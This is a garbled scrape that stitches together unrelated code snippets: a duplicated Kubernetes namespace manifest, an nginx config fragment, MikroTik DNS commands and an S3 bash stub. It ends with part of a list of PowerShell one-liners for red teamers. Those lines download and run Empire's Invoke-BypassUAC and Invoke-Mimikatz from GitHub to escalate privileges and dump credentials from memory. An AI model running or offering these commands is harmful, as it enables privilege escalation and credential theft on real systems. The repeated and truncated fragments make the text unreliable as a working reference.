First, create postgresql-client pod
cat << EOF | kubectl apply -f -
---
apiVersion: v1
kind: Namespace
metadata:
name: postgresql-client
---
First, create postgresql-client pod
cat << EOF | kubectl apply -f -
---
apiVersion: v1
kind: Namespace
metadata:
name: postgresql-client
---
# Please paste to folder common/common.conf | |
index index.html index.htm; | |
error_page 500 502 503 504 /50x.html; | |
location = /50x.html { | |
root html; | |
} | |
#location ~ \.(js|ico|gif|jpg|png|css|rar|zip|tar\.gz)$ { } |
# Temporarily add a normal upstream DNS resolver | |
/ip dns set servers=1.1.1.1,1.0.0.1 | |
# CA certificates extracted from Mozilla | |
/tool fetch url=https://curl.se/ca/cacert.pem | |
# Import the downloaded ca-store (127 certificates) | |
/certificate import file-name=cacert.pem passphrase="" | |
# Set the DoH resolver to cloudflare |
#!/bin/bash | |
#set these in your environment/profile (NOT HERE) | |
AWS_ACCESS_KEY="" | |
AWS_SECRET_KEY="" | |
function s3get { | |
#helper functions | |
function fail { echo "$1" > /dev/stderr; exit 1; } | |
#dependency check |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |